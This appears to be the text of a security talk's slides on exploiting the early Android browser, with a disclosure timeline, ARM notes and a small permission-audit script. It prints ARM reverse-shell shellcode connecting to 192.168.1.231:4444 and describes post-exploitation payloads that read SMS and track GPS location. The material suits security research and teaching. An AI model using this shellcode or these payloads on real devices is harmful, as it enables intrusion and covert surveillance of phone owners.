My 1st exploit timelineMy 1st exploit timeline

Early SDKs were full of bugs

Pwn2Own WebKit bug was in the SDK leading up to launch

October 20th - saw it was on the phone too, reported to Google

October 22nd - launch

October 25th - reported in media (no details)

November 1st - OTA update fixes it

Page 52: Pulling a John Connor: Defeating Android

OTA update

Page 53: Pulling a John Connor: Defeating Android

How’d I get a pre-launch phone?

Page 54: Pulling a John Connor: Defeating Android

Android exploits = Linux exploits

A diff between the iPhone and Android versions of the exploit consists of exactly:

Shellcode - duh

Data which writes over heap metadata (see below)

Address of sled (in sled and in overflow)

THAT’S IT!

The heap metadata that was crushed was different

Different libc

Just had to see what we needed to survive for a bit

Page 55: Pulling a John Connor: Defeating Android

Exploit dev and emulator

My original exploit developed for the emulator worked out of the box on the real device

Some addresses may be different

Very robust exploits will work on both, but may have to debug on phone, yuck

Page 56: Pulling a John Connor: Defeating Android

ARM basics

RISC

2 or 4 byte instructions

16 registers

First arguments go in r0-r4

Then stack

Syscall number goes in r7

Page 57: Pulling a John Connor: Defeating Android

 0: e3a00002  mov  r0, #2            ; 0x2
 4: e3a01001  mov  r1, #1            ; 0x1
 8: e3a02006  mov  r2, #6            ; 0x6
 c: e1a07401  lsl  r7, r1, #8
10: e2877019  add  r7, r7, #25       ; 0x19
14: ef000000  svc  0x00000000        fd = socket(AF_INET, SOCK_STREAM, SOL_TCP);
18: e1a0a000  mov  sl, r0
1c: eb000001  bl   28 <shellcode+0x28>
20: 5c110002  serv_addr 4444
24: e701a8c0  192.168.1.231
28: e1a0000a  mov  r0, sl
2c: e1a0100e  mov  r1, lr
30: e3a02010  mov  r2, #16           ; 0x10
34: e3a07001  mov  r7, #1            ; 0x1
38: e1a07407  lsl  r7, r7, #8
3c: e287701b  add  r7, r7, #27       ; 0x1b
40: ef000000  svc  0x00000000        connect(fd, serv_addr, 16);
44: e3a05002  mov  r5, #2            ; 0x2    r5 = 2;
48: e3a0703f  mov  r7, #63           ; 0x3f   do {
4c: e1a0000a  mov  r0, sl
50: e1a01005  mov  r1, r5
54: ef000000  svc  0x00000000        dup2(fd, r5)
58: e2455001  sub  r5, r5, #1        ; 0x1    r5--;
5c: e2550000  subs r0, r5, #0        ; 0x0
60: aafffff8  bge  48 <shellcode+0x48>        } while(r5>0)
64: e0455005  sub  r5, r5, r5
68: e1a0600d  mov  r6, sp
6c: e24dd020  sub  sp, sp, #32       ; 0x20
70: e28f0014  add  r0, pc, #20       ; 0x14
74: e4860000  str  r0, [r6]
78: e5865004  str  r5, [r6, #4]
7c: e1a01006  mov  r1, r6
80: e3a02000  mov  r2, #0            ; 0x0
84: e3a0700b  mov  r7, #11           ; 0xb
88: ef000000  svc  0x00000000        execve("/system/bin/sh", ..., 0)
8c: 7379732f
90: 2f6d6574
94: 2f6e6962
98: 00006873

Page 58: Pulling a John Connor: Defeating Android

Exploit demo

Page 59: Pulling a John Connor: Defeating Android

After access

Straying from the sandbox

Payloads

Page 60: Pulling a John Connor: Defeating Android

Sandbox

You can do anything the browser can do

Persist across reboots

Get SMS messages

dumpsys gives alerts, which include SMS info

ls -l /data/data/com.android.browser/databases
-rw-r--r-- app_1    app_1        3608 2009-01-20 01:52 webviewCache.db-journal
-rw-rw---- app_1    app_1       17408 2009-01-16 05:04 webview.db
-rw-rw---- app_1    app_1       12288 2009-01-20 01:52 browser.db
-rw-rw---- app_1    app_1        6144 2009-01-20 01:51 webviewCache.db

ls -l /data/data/com.android.browser/app_plugins/gears.so
-rw------- app_1    app_1     1169164 2009-01-12 16:38 gears.so
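The listings above are what the sandbox boundary actually looks like on disk: everything under the browser's private directory is owned by its uid (app_1), but one file, webviewCache.db-journal, is mode 644 and therefore readable by any other uid on the phone. The following script is an added example (not from the talk) that parses such ls -l output and flags entries another uid could read or write, plus any native code a plugin loads that is writable beyond its owner; the two listings embedded are the slide's own, and the check logic is the author's.

```python
import re

# Constructed sample: the two directory listings quoted on the slide above.
LISTINGS = {
    "/data/data/com.android.browser/databases": """\
-rw-r--r-- app_1    app_1        3608 2009-01-20 01:52 webviewCache.db-journal
-rw-rw---- app_1    app_1       17408 2009-01-16 05:04 webview.db
-rw-rw---- app_1    app_1       12288 2009-01-20 01:52 browser.db
-rw-rw---- app_1    app_1        6144 2009-01-20 01:51 webviewCache.db
""",
    "/data/data/com.android.browser/app_plugins": """\
-rw------- app_1    app_1     1169164 2009-01-12 16:38 gears.so
""",
}

# mode  owner  group  size  date time  name  (Android toolbox 'ls -l' layout)
LS_RE = re.compile(r"^([-dl][rwx-]{9})\s+(\S+)\s+(\S+)\s+(\d+)\s+(\S+ \S+)\s+(.+)$")

def parse_ls(text):
    """Parse 'ls -l' lines into (mode, owner, group, size, name) tuples."""
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line)
        if m:                        # skips 'total' lines and anything unparsable
            entries.append((m.group(1), m.group(2), m.group(3), int(m.group(4)), m.group(6)))
    return entries

def audit(listings, app_uid):
    """Findings for files in an app-private directory that a different uid could touch."""
    findings = []
    for directory, text in listings.items():
        for mode, owner, group, size, name in parse_ls(text):
            path = directory + "/" + name
            if owner != app_uid:
                findings.append((path, "owned by %s, not the app uid %s" % (owner, app_uid)))
            other = mode[7:10]       # rwx bits for everyone else, i.e. other app uids
            if "r" in other:
                findings.append((path, "world-readable (%s)" % mode))
            if "w" in other:
                findings.append((path, "world-writable (%s)" % mode))
            if name.endswith(".so") and "w" in mode[4:10]:
                findings.append((path, "native code writable by group or world (%s)" % mode))
    return findings

if __name__ == "__main__":
    for path, problem in audit(LISTINGS, "app_1"):
        print(path, "-", problem)
```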

Page 61: Pulling a John Connor: Defeating Android

Payloads

Can write standard shellcode

Can write shellcode that uses the Android API

Can write C/C++ programs

Probably can’t use your own Java apps...

Page 62: Pulling a John Connor: Defeating Android

Example C++ payload

Modified gpstest from the Android source code

Change it not to use libhardware.so

Have it call gps_get_hardware_interface from libgps.so

Place libgps.so, librpc.so (from phone) in out/target/product/generic/obj/lib/

./agcc.pl -fno-short-enums -o gpstest gpstest.cpp -lgps

./gpstest
status: GPS_STATUS_SESSION_BEGIN
status: GPS_STATUS_ENGINE_ON
SV: 15 SNR: 23.7 Elev: 53.0 Azim: 146.0 E A
Got Fix: latitude: XX.577622 longitude: -XX.604768 altitude: 190.0
...

Page 63: Pulling a John Connor: Defeating Android

Thanks

Mark Daniel - debugging guru

Owen Arden - king of fuzz

Page 64: Pulling a John Connor: Defeating Android

Questions?

Contact me at [email protected]